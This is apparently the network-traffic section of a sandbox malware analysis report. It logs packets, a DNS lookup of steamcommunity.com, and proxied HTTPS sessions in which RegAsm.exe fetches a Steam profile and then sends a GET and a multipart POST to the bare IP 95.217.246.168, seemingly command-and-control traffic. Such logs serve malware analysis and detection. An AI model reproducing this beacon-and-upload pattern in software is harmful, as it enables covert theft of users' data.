Apr 26, 2024 11:03:21.713808060 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.783816099 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.783931017 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.784029007 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.784049988 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.784106016 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.829261065 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.829307079 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.829361916 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.829372883 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.829421043 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.887181044 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.887232065 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.887309074 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.887343884 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.887372971 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.890969992 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.939685106 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.939727068 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.939790010 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.939800978 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.939841032 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.984224081 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.984276056 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.984371901 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.984391928 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:21.984422922 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:21.986954927 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.027934074 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.028011084 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.028050900 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.028062105 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.028130054 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.060853004 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.060903072 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.060957909 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.060976028 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.060997963 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.064949989 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.091362000 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.091382027 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.091480970 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.091500044 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.091547966 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.116506100 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.116523981 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.116694927 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.116708994 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.116761923 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.140239954 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.140259027 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.140357018 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.140369892 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.140419006 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.158984900 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.159066916 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.159092903 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.159096003 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.159153938 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.159594059 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.159612894 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.204513073 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.204597950 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.204715967 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.204969883 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.205008984 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.731569052 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.732988119 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.786794901 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.786822081 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:22.787012100 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:22.787024975 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:23.567337036 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:23.567382097 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:23.567404032 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:23.567431927 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:23.567502022 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:23.567538977 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:23.567562103 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:23.567584991 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:23.567606926 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:23.683732033 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:23.683754921 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:23.683832884 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:23.683876991 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:23.683901072 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:23.683926105 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:23.869745970 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:23.869769096 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:23.869872093 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:23.869895935 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:23.869956970 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:23.974874973 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:23.974895954 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:23.975008011 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:23.975069046 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:23.975131035 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:24.066612005 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:24.066711903 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:24.066734076 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:24.066742897 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:24.066795111 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:24.067420959 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:24.067450047 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:24.753391981 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:24.753489017 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:24.753567934 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:24.754384995 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:24.754437923 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:25.291636944 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:25.291749954 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:26.375588894 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:26.375653982 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:26.375736952 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:26.375751972 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:27.269612074 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:27.269671917 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:27.269757032 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:27.269798994 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:27.269844055 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:27.269851923 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:27.269943953 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:27.270318031 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:27.270345926 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:27.275810957 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:27.275897026 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:27.276073933 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:27.276678085 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:27.276710987 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:27.805078983 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:27.805197954 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:27.805639029 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:27.805664062 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:27.805788994 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:27.805802107 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:28.724559069 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:28.724628925 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:28.724651098 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:28.724693060 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:28.724710941 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:28.724756956 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:28.724772930 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:28.724782944 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:28.740094900 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:28.740195036 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:28.740303040 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:28.740461111 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:28.740484953 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:29.273821115 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:29.273916006 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:29.274300098 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:29.274319887 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:29.274466991 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:29.274478912 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:30.197505951 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:30.197670937 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:30.197741032 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:30.197741032 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:30.200263977 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:30.200325012 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:30.807719946 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:30.807796001 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:30.807893038 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:30.808088064 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:30.808129072 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:31.337085962 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:31.337280989 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:31.337635994 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:31.337654114 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:31.337793112 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:31.337804079 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:31.337896109 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:31.337919950 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:31.338025093 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:31.338057995 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:31.338179111 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:31.338407040 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:31.338535070 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:31.338562965 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:31.338582993 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:31.338613033 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:31.338640928 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:31.338684082 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:33.219202995 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:33.219362020 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:33.219378948 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:33.219472885 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:33.219794035 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:33.219827890 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:33.223210096 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:33.223237991 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:33.223297119 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:33.223486900 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:33.223495960 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:33.754389048 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:33.754471064 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:33.754928112 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:33.754968882 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:33.755075932 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:33.755090952 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:34.698038101 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:34.698152065 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:34.698194027 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:34.698246002 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:34.698271990 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:34.698297024 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:34.698519945 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:34.698551893 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:34.699737072 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:34.699768066 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:34.699830055 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:34.700021982 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:34.700047970 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:35.232974052 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:35.233059883 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:35.233582020 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:35.233593941 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:35.233767986 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:35.233774900 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:36.169610023 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:36.169718027 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:36.169733047 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:36.169768095 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:36.169775009 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:36.169811964 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:36.169950962 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:36.169967890 CEST	443	49758	95.217.246.168	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 11:02:51.842571974 CEST	62821	53	192.168.2.4	1.1.1.1
Apr 26, 2024 11:02:51.967952013 CEST	53	62821	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 26, 2024 11:02:51.842571974 CEST	192.168.2.4	1.1.1.1	0xcb62	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 26, 2024 11:02:51.967952013 CEST	1.1.1.1	192.168.2.4	0xcb62	No error (0)	steamcommunity.com		23.194.234.100	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

95.217.246.168

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	23.194.234.100	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:02:52 UTC	119	OUT	GET /profiles/76561199677575543 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 09:02:52 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 26 Apr 2024 09:02:52 GMT Content-Length: 33805 Connection: close Set-Cookie: sessionid=2fa8ed49974f8f2e552f4fd3; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C3594b93e28a41c3ff76e602fcd1c38eb; Path=/; Secure; HttpOnly; SameSite=None
2024-04-26 09:02:52 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-04-26 09:02:52 UTC	10062	IN	Data Raw: 6c 6c 64 6f 77 6e 20 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6c 69 6e 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0d 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0d 0a 09 09 09 Data Ascii: lldown global_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
2024-04-26 09:02:52 UTC	9229	IN	Data Raw: 70 61 72 74 6e 65 72 2e 73 74 65 61 6d 67 61 6d 65 73 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 70 61 72 74 6e 65 72 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 54 45 52 4e 41 4c 5f 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 73 74 61 74 73 2e 76 61 6c 76 65 2e 6f 72 67 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 5f 43 4c 49 45 4e 54 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 55 53 45 5f 50 4f 50 55 50 53 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 53 54 4f 52 Data Ascii: partner.steamgames.com\/","STATS_BASE_URL":"https:\/\/partner.steampowered.com\/","INTERNAL_STATS_BASE_URL":"https:\/\/steamstats.valve.org\/","IN_CLIENT":false,"USE_POPUPS":false,"STOR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:02:53 UTC	171	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 09:02:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:02:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 09:02:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:02:54 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEGCBAAFHDHDHJKEGCFC User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 278 Connection: Keep-Alive Cache-Control: no-cache
